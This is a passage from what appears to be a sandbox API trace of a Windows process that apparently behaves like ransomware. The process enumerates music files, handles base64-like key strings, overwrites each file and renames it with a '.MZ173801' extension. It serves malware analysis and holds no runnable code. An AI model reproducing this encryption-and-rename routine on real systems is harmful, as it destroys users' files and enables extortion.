dwReserved1=0x77a601e9, cFileName="hMFp.mp3", cAlternateFileName="")) returned 1 [0118.196] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.196] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.196] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\hMFp.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\hmfp.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa738b950, ftCreationTime.dwHighDateTime=0x1d5e883, ftLastAccessTime.dwLowDateTime=0x56830880, ftLastAccessTime.dwHighDateTime=0x1d5ee50, ftLastWriteTime.dwLowDateTime=0x56830880, ftLastWriteTime.dwHighDateTime=0x1d5ee50, nFileSizeHigh=0x0, nFileSizeLow=0x6d0f)) returned 1 [0118.196] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.196] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0118.197] GetCurrentThreadId () returned 0x1358 [0118.197] GetCurrentThreadId () returned 0x1358 [0118.197] GetCurrentThreadId () returned 0x1358 [0118.197] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.197] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0118.197] GetCurrentThreadId () returned 0x1358 [0118.197] GetCurrentThreadId () returned 0x1358 [0118.198] GetCurrentThreadId () returned 0x1358 [0118.198] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\hMFp.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\hmfp.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0118.198] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0118.198] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0118.198] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x6d0f [0118.198] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0118.198] ReadFile (in: hFile=0x404, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x6d0f, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x6d0f, lpOverlapped=0x0) returned 1 [0118.199] CloseHandle (hObject=0x404) returned 1 [0118.199] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\hMFp.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\hmfp.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0118.201] WriteFile (in: hFile=0x404, lpBuffer=0x2439b60*, nNumberOfBytesToWrite=0x6d0f, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x2439b60*, lpNumberOfBytesWritten=0x19f424*=0x6d0f, lpOverlapped=0x0) returned 1 [0118.202] CloseHandle (hObject=0x404) returned 1 [0118.203] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\hMFp.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\hmfp.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\hMFp.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\hmfp.mp3.mz173801")) returned 1 [0118.204] GetCurrentThreadId () returned 0x1358 [0118.204] GetCurrentThreadId () returned 0x1358 [0118.204] GetCurrentThreadId () returned 0x1358 [0118.204] GetCurrentThreadId () returned 0x1358 [0118.204] GetCurrentThreadId () returned 0x1358 [0118.204] GetCurrentThreadId () returned 0x1358 [0118.204] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34899570, ftCreationTime.dwHighDateTime=0x1d5eac0, ftLastAccessTime.dwLowDateTime=0x41b39940, ftLastAccessTime.dwHighDateTime=0x1d5e0fb, ftLastWriteTime.dwLowDateTime=0x41b39940, ftLastWriteTime.dwHighDateTime=0x1d5e0fb, nFileSizeHigh=0x0, nFileSizeLow=0x9379, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="lFuTB4aA.m4a", cAlternateFileName="")) returned 1 [0118.204] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.204] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.204] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\lFuTB4aA.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\lfutb4aa.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34899570, ftCreationTime.dwHighDateTime=0x1d5eac0, ftLastAccessTime.dwLowDateTime=0x41b39940, ftLastAccessTime.dwHighDateTime=0x1d5e0fb, ftLastWriteTime.dwLowDateTime=0x41b39940, ftLastWriteTime.dwHighDateTime=0x1d5e0fb, nFileSizeHigh=0x0, nFileSizeLow=0x9379)) returned 1 [0118.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0118.205] GetCurrentThreadId () returned 0x1358 [0118.205] GetCurrentThreadId () returned 0x1358 [0118.205] GetCurrentThreadId () returned 0x1358 [0118.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0118.206] GetCurrentThreadId () returned 0x1358 [0118.206] GetCurrentThreadId () returned 0x1358 [0118.206] GetCurrentThreadId () returned 0x1358 [0118.206] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\lFuTB4aA.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\lfutb4aa.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0118.206] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0118.206] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0118.206] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | 